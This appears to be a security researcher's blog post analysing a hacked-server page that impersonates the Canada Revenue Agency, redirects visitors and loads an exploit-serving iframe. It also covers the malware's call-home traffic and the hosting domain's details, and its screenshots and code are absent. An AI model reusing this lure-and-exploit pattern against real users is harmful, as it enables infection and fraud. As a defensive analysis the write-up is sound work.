The Latest in IT Security

An ant-hill full of bots


I found a malicious page placed on a hacked server:

CRA stands for Canada Revenue Agency, as you can see in the page’s source code below:

The meta tag redirects to the Canada Revenue Agency’s website after a few seconds:

But what is the rest of the obfuscated code?

Here is the deobfuscated version (courtesy of Wepawet):

Now we know more about the intent behind this cra.html page. The URL the iframe points to will load multiple exploits:

I noticed that Google Chrome warned me prior to running the script (which I did anyway for testing purposes):

This is a pretty cool feature that can prevent many infections. Thanks Google :-)

Following a successful installation, the malware will call at regular intervals and send data in what looks like a custom obfuscation form:

Let’s check out the malicious domain:

Location: Moscow, Russia
ASN: AS12695 (DINET-AS Digital Network JSC)
Registrar: BIZCN.COM, INC.

Registrant information is bogus (of course):
Ricardo GALENO
9999999999 fax: 9999999999
1928 BURTON DR 157
Savannah TX 78741

Other domain names on that server include:

This ASN is deeply involved in allowing CnC servers and other bot related activities:

Google Safe Bowsing

At this moment, I am not sure what the connection (if any) between the malware and the Canadian Revenue Agency is.

Here are a couple of VirusTotal reports from some of the binaries that were dropped. VT1, VT2.

Jerome Segura

Leave a reply


MONDAY, JULY 04, 2022

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...



Latest Comments